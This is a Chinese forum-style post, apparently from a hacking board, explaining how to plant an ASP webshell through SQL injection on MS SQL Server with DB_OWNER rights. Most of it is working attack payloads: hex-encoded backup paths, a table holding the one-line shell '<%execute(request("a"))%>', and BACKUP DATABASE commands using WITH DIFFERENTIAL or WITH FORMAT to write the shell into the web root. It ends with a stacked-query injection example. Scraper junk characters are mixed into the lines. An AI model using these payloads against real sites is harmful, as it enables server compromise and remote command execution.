DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
$ ]& T- B! ^6 a$ M* w
4 m* r# l# k, Y* `减少备份文件大小，得到可执行的webshell成功率提高不少
# d% j/ m6 _$ ^8 \! F一利用差异备份
3 x( C) {& F% A9 S加一个参数WITH DIFFERENTIAL

: @+ {, V1 A! i/ W3 O1
8 B) P0 V* w/ O! Q! C2
! d; ~  N3 e1 V! l7 r# k3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* x0 X; Q+ R$ T$ o+ Zdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
0 H* r  ^( v" S7 E2 k" {( U
5 a# g" Y& }* d3 T二利用完全FORMAT
! ^9 {0 ?# S" `! q/ ^" v加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
* \# _. s5 H5 d; ?# Z' f6 u
' H1 z2 k- {; l) z% g! R$ L* |6 }. z1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
) Z% [  `7 @; Ninsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
' f4 |+ [2 L+ s3 l7 Y1
% H- q% a. g2 I$ N
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

) j, x* H4 O5 S$ E" Y$ b2

! |7 Z/ D9 ?4 n3 {1
' m1 d) v: |( w, j1 J id=1;backup database model to disk='你的路径‘ with differential,format;--